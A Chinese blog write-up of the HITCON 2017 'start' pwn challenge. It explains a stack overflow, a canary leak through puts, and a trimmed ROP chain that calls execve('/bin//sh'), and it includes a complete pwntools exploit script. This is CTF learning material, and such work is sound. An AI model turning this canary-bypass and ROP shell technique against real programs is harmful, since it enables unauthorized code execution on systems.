前言

hitcon 2017start 题,比较简单,练练手。

题目链接:

https://gitee.com/hac425/blog_data/tree/master/hitcon2017

正文

rbp-0x20 读入 0xd9 的数据,溢出。

程序开了 cancary ,又后面直接 puts 把我们输入的打印出来

我们可以直接溢出到 cancary, 然后用 puts 泄露 cancary, 这里有个小 tips , cancary 的最低位 为 \x00, 我们需要多多溢出一个 字节,覆盖掉这个 \x00, 这样才能 泄露 cancary



拿到 cancary 后就是正常的 rop 了,直接使用

ROPgadget --binary ./start --ropchain

生成 rop 链,不过此时的 rop 链太长,我们需要改一改。

后面用来大量的 add 来设置 rax 设置后面的 syscall 的系统调用号。最后调用 execve(“/bin//sh”, 0, 0), 把这一大串直接用前面找到的 gadgets 替换掉即可。



长度刚好。

总结

rop 没必要一个一个手撸, 改改生成的就行,然后就是 send 之间一定要 sleep ,要不然玄学......

完整exp

#!/usr/bin/env python

# encoding: utf-8

from pwn import *

context.log_level = "debug"

from struct import pack

import time

# Padding goes here

p = ''

p += pack('<Q', 0x00000000004017f7) # pop rsi ; ret

p += pack('<Q', 0x00000000006cc080) # @ .data

p += pack('<Q', 0x000000000047a6e6) # pop rax ; pop rdx ; pop rbx ; ret

p += '/bin//sh'

p += pack('<Q', 0x4141414141414141) # padding

p += pack('<Q', 0x4141414141414141) # padding

p += pack('<Q', 0x0000000000475fc1) # mov qword ptr [rsi], rax ; ret

p += pack('<Q', 0x00000000004017f7) # pop rsi ; ret

p += pack('<Q', 0x00000000006cc088) # @ .data + 8

p += pack('<Q', 0x000000000042732f) # xor rax, rax ; ret

p += pack('<Q', 0x0000000000475fc1) # mov qword ptr [rsi], rax ; ret

p += pack('<Q', 0x00000000004005d5) # pop rdi ; ret

p += pack('<Q', 0x00000000006cc080) # @ .data

p += pack('<Q', 0x00000000004017f7) # pop rsi ; ret

p += pack('<Q', 0x00000000006cc088) # @ .data + 8

p += pack('<Q', 0x0000000000443776) # pop rdx ; ret

p += pack('<Q', 0x00000000006cc088) # @ .data + 8

p += p64(0x000000000047a6e6)

p += p64(59)

p += p64(0)

p += p64(0)

p += p64(0x0000000000468e75)

print(hex(len(p)))

print hex(len(p))

rop = p

r  = process("./start")

# gdb.attach(r, '''

# # bp *0x0400B5C

# bp *0x0400B96

# c

# 	''')

pause()

# it could send "b" *0x18 + "\n"

r.sendline("b" * ( 0x20 - 0x8 ))

time.sleep(0.2)

r.recvuntil("b" * ( 0x20 - 0x8 ))

r.recv(1)

cancary = u64("\x00" + r.recv(7))

log.info("get cancary: " + hex(cancary))

pause()

payload = "exit\n\x00"

payload += "b" * ( 0x20 - 0x8 - len(payload))  # padding for cancary

payload += p64(cancary)

payload += "A" * 8  # padding for ret

payload += rop    # rip

print hex(len(payload))

r.sendline(payload)

time.sleep(0.2)

r.interactive()

syscall to rop的更多相关文章

  1. 栈溢出之rop到syscall

    当程序开启了nx,但程序有syscall调用的时候.这时栈溢出的利用就可以通过rop来执行syscall的59号调用execve('/bin/sh',null,null),这是这次alictf一道pw ...

  2. D^3ctf两道 pwn

    这次 的D^3ctf 又是给吊打 难顶... 所以题都是赛后解出来的,在这感谢Peanuts师傅 unprintableV 看看保护: 看看伪代码,其实代码很少 void __cdecl menu() ...

  3. 20145236《网络对抗》进阶实验——64位Ubuntu 17.10.1 ROP攻击

    20145236<网络对抗>进阶实验--64位Ubuntu 17.10.1 ROP攻击 基础知识 ROP攻击 ROP全称为Retrun-oriented Programmming(面向返回 ...

  4. Linux pwn入门教程(3)——ROP技术

    作者:Tangerine@SAINTSEC 原文来自:https://bbs.ichunqiu.com/thread-42530-1-1.html 0×00 背景 在上一篇教程的<shellco ...

  5. 64位Ubuntu系统下ROP攻击

    64位Ubuntu系统下ROP攻击 基础知识 ROP攻击 ROP全称为Retrun-oriented Programmming(面向返回的编程)是一种新型的基于代码复用技术的攻击,攻击者从已有的库或可 ...

  6. 一步一步pwn路由器之rop技术实战

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 这次程序也是 DVRF 里面的,他的路径是 pwnable/She ...

  7. No_leak(ret2ROP + 低字节改写到syscall)

    No_leak 有这种题,题目很短小,只有一个read函数,没有输出函数,这样的题怎么解呢?当然首先想到的是ret2dl,但是那个有点儿复杂.下面我来介绍一种简单的解法. 代码如下: //gcc 1. ...

  8. Syscall,API,ABI

    系统调用(Syscall):Linux2.6之前是使用int0x80(中断)来实现系统调用的,在2.6之后的内核是使用sysentry/sysexit(32位机器)指令来实现的系统调用,这两条指令是C ...

  9. 一步一步学ROP之linux_x64篇

    一步一步学ROP之linux_x64篇 一.序 **ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防 ...

随机推荐

  1. 【learning】微信跳一跳辅助c++详解 轻松上万 【下】

    如果你还没有看完本blog的上篇,建议您先看完上篇!! 第一代辅助如何死的? 我们先来看四张图      如上方最左图所示,前面是一个小圆柱子,看起来很人畜无害似不似?? 由于上一步跳出了偏差,并没有 ...

  2. JavaScript 函数定义方法

    JavaScript 函数定义方法. 函数声明 在之前的教程中,你已经了解了函数声明的语法 : function functionName(parameters) { 执行的代码 } 函数声明后不会立 ...

  3. Impala配置HA-Nginx

    Impala的高可用配置,官方的例子用的是Haproxy,考虑到nginx配置简单,使用人群广泛,再加上nginx1.9以后支持TCP的负载均衡,所以选用nginx. nginx安装:yum inst ...

  4. windows 64位 下 安装 tomcat

    tomcat 版本 windows 64位 .zip apache-tomcat-7.0.42.zip 注意: 1. 安装目录不得有 空格 或 中文字符 2. 然后,在系统环境变量下,新建一个变量: ...

  5. 《LeetBook》leetcode题解(20):Valid Parentheses[E]——栈解决括号匹配问题

    我现在在做一个叫<leetbook>的免费开源书项目,力求提供最易懂的中文思路,目前把解题思路都同步更新到gitbook上了,需要的同学可以去看看 书的地址:https://hk029.g ...

  6. jquery获取input的checked属性

    1.经常需要判断某个按钮是否被选中. 2.基于jquery. <!DOCTYPE html> <html lang="en"> <head> & ...

  7. SpringMVC源码阅读:视图解析器

    1.前言 SpringMVC是目前J2EE平台的主流Web框架,不熟悉的园友可以看SpringMVC源码阅读入门,它交代了SpringMVC的基础知识和源码阅读的技巧 本文将通过源码(基于Spring ...

  8. Iframe内联框架

    iframe:内联框架标签,用于在网页中任意的位置嵌入另一个网页 <iframe src="url地址"> </iframe> iframe标签的常用属性 ...

  9. Oracle11g密码过期处理方法

    首先 查询密码有效期:   SELECT * FROM dba_profiles s WHERE s.profile='DEFAULT' AND resource_name='PASSWORD_LIF ...

  10. C#关于操作符重载与转换

    随便写写 首先,假设我们有一个Person类型 其类型定义如下 class Person { public string Name { get; set; } = "Person" ...